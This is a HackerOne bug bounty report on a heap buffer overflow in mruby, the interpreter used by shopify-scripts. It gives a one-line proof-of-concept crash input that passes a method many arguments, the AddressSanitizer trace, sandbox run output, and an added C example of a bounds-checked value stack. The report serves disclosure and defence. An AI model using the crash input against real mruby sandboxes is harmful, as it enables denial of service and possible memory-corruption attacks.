hackerone / titanous / H1:204421
History: Feb 08, 2017 - 1:08 a.m.

shopify-scripts: Heap buffer overflow with many arguments

2017-02-08 01:08:34
titanous
hackerone.com
$800
10

The following program triggers a heap buffer overflow:

d 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 < 0 - 0.-- 0

ASAN report:

=================================================================
==3720==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d00001e880 at pc 0x0000004ae8ac bp 0x7ffee59f8930 sp 0x7ffee59f80e0
WRITE of size 16 at 0x61d00001e880 thread T0
    #0 0x4ae8ab in __asan_memcpy (/vagrant/bin/mruby+0x4ae8ab)
    #1 0x64ad6d in value_move /vagrant/src/value_array.h:14:15
    #2 0x629792 in mrb_vm_exec /vagrant/src/vm.c:1181:11
    #3 0x620b8b in mrb_vm_run /vagrant/src/vm.c:801:10
    #4 0x64d298 in mrb_top_run /vagrant/src/vm.c:2533:12
    #5 0x676ec9 in mrb_load_exec /vagrant/mrbgems/mruby-compiler/core/parse.y:5755:7
    #6 0x677b65 in mrb_load_file_cxt /vagrant/mrbgems/mruby-compiler/core/parse.y:5764:10
    #7 0x4f3af5 in main /vagrant/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:232:11
    #8 0x7fb19c1e3f44 in __libc_start_main /build/eglibc-oGUzwX/eglibc-2.19/csu/libc-start.c:287
    #9 0x41a505 in _start (/vagrant/bin/mruby+0x41a505)

0x61d00001e880 is located 0 bytes to the right of 2048-byte region [0x61d00001e080,0x61d00001e880)
allocated by thread T0 here:
    #0 0x4c4c0d in realloc (/vagrant/bin/mruby+0x4c4c0d)
    #1 0x5c14f5 in mrb_default_allocf /vagrant/src/state.c:60:12
    #2 0x550b96 in mrb_realloc_simple /vagrant/src/gc.c:201:8
    #3 0x5511e4 in mrb_realloc /vagrant/src/gc.c:215:8
    #4 0x551b23 in mrb_malloc /vagrant/src/gc.c:236:10
    #5 0x551bbd in mrb_calloc /vagrant/src/gc.c:254:9
    #6 0x618d19 in stack_init /vagrant/src/vm.c:92:28
    #7 0x616446 in mrb_funcall_with_block /vagrant/src/vm.c:365:7
    #8 0x615e60 in mrb_funcall_with_block /vagrant/src/vm.c:343:13
    #9 0x6156dc in mrb_funcall_argv /vagrant/src/vm.c:447:10
    #10 0x5247e7 in mrb_obj_new /vagrant/src/class.c:1412:3
    #11 0x53f2fe in mrb_exc_new_str /vagrant/src/error.c:32:10
    #12 0x5489ee in mrb_init_exception /vagrant/src/error.c:550:20
    #13 0x6a5710 in mrb_init_core /vagrant/src/init.c:41:3
    #14 0x5c1495 in mrb_open_core /vagrant/src/state.c:47:3
    #15 0x5c163c in mrb_open_allocf /vagrant/src/state.c:107:20
    #16 0x5c160a in mrb_open /vagrant/src/state.c:99:20
    #17 0x4f29d3 in main /vagrant/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:172:20
    #18 0x7fb19c1e3f44 in __libc_start_main /build/eglibc-oGUzwX/eglibc-2.19/csu/libc-start.c:287

SUMMARY: AddressSanitizer: heap-buffer-overflow (/vagrant/bin/mruby+0x4ae8ab) in __asan_memcpy
Shadow bytes around the buggy address:
  0x0c3a7fffbcc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fffbcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fffbce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fffbcf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fffbd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c3a7fffbd10:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbd20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbd30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbd50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3a7fffbd60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==3720==ABORTING
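The trace above places the faulting write in value_move, called from mrb_vm_exec, exactly 0 bytes past the 2048-byte region that stack_init allocated, which is consistent with a bulk copy of argument values onto a VM value stack that was never grown to hold them. As an added illustration, not mruby's code and not the fix the mruby maintainers or Shopify applied, the following hypothetical toy value stack in C shows the shape of the defensive check: a capacity check that runs before the copy and either grows the stack or refuses the call at a hard limit. The 16-byte value size and the 128-slot (2048-byte) initial region are taken from the trace; the names vm_value, stack_ensure, stack_push_args and demo_push, and the STACK_MAX_SLOTS limit, are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical 16-byte VM value; the ASAN trace reports 16-byte writes. */
typedef struct {
    uint64_t tag;
    uint64_t payload;
} vm_value;

/* 128 slots * 16 bytes = the 2048-byte region seen in the trace.
   STACK_MAX_SLOTS is an assumed hard limit, not an mruby constant. */
#define STACK_INIT_SLOTS 128
#define STACK_MAX_SLOTS  (1u << 16)

typedef struct {
    vm_value *base;  /* heap region holding the value stack */
    size_t used;     /* slots in use (the stack pointer) */
    size_t cap;      /* slots allocated */
} vm_stack;

int stack_init(vm_stack *st) {
    st->base = calloc(STACK_INIT_SLOTS, sizeof(vm_value));
    if (st->base == NULL) return -1;
    st->used = 0;
    st->cap = STACK_INIT_SLOTS;
    return 0;
}

void stack_free(vm_stack *st) {
    free(st->base);
    st->base = NULL;
    st->used = st->cap = 0;
}

/* Make room for `need` more slots. Returns 0 on success, -1 when the hard
   limit would be exceeded or memory runs out; the caller must then raise
   an error instead of copying. The subtraction form avoids size_t wrap-around. */
int stack_ensure(vm_stack *st, size_t need) {
    if (need > STACK_MAX_SLOTS - st->used) return -1;
    size_t required = st->used + need;
    if (required <= st->cap) return 0;
    size_t newcap = st->cap;
    while (newcap < required) newcap *= 2;
    if (newcap > STACK_MAX_SLOTS) newcap = STACK_MAX_SLOTS;
    vm_value *p = realloc(st->base, newcap * sizeof(vm_value));
    if (p == NULL) return -1;
    memset(p + st->cap, 0, (newcap - st->cap) * sizeof(vm_value)); /* new slots start zeroed */
    st->base = p;
    st->cap = newcap;
    return 0;
}

/* Unchecked bulk copy of values, like a value_move helper: it trusts its
   caller, so the bounds check has to happen before it is reached. */
static void value_move(vm_value *dst, const vm_value *src, size_t n) {
    memcpy(dst, src, n * sizeof(vm_value));
}

/* Checked push of an argument array onto the value stack. */
int stack_push_args(vm_stack *st, const vm_value *args, size_t argc) {
    if (stack_ensure(st, argc) != 0) return -1;   /* the check that precedes the copy */
    value_move(st->base + st->used, args, argc);
    st->used += argc;
    return 0;
}

/* Push `argc` constructed argument values onto a fresh stack.
   Returns the stack capacity in slots after the push, or 0 if the push was rejected. */
size_t demo_push(size_t argc) {
    vm_stack st;
    vm_value *args;
    size_t result = 0;
    if (stack_init(&st) != 0) return 0;
    args = calloc(argc ? argc : 1, sizeof(vm_value));   /* constructed sample arguments */
    if (args == NULL) { stack_free(&st); return 0; }
    for (size_t i = 0; i < argc; i++) { args[i].tag = 1; args[i].payload = i; }
    if (stack_push_args(&st, args, argc) == 0 && st.used == argc)
        result = st.cap;
    free(args);
    stack_free(&st);
    return result;
}

int main(void) {
    printf("128 args   -> cap %zu\n", demo_push(128));  /* fits the initial region */
    printf("200 args   -> cap %zu\n", demo_push(200));  /* grows instead of overflowing */
    printf("%u args -> cap %zu\n", STACK_MAX_SLOTS + 1, demo_push(STACK_MAX_SLOTS + 1));
    return 0;
}
```

The point of the split between stack_ensure and value_move is that the unchecked copy is only ever reached through a path that has already verified capacity; an argument count that exceeds the hard limit is refused before any write happens, which is the outcome a sandboxed interpreter wants in place of a heap overflow.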
vagrant@vagrant-ubuntu-trusty-64:/vagrant$ ASAN_SYMBOLIZER_PATH=/usr/lib/llvm-3.8/bin/llvm-symbolizer bi^Cmruby crash-triage/02.rb
vagrant@vagrant-ubuntu-trusty-64:/vagrant$ ~/mruby-engine/bin/sandbox crash-triage/02.rb
/home/vagrant/mruby-engine/bin/sandbox:20:in `sandbox_eval': undefined method '-' for nil (MRubyEngine::EngineRuntimeError)
	from /home/vagrant/mruby-engine/bin/sandbox:20:in `<main>'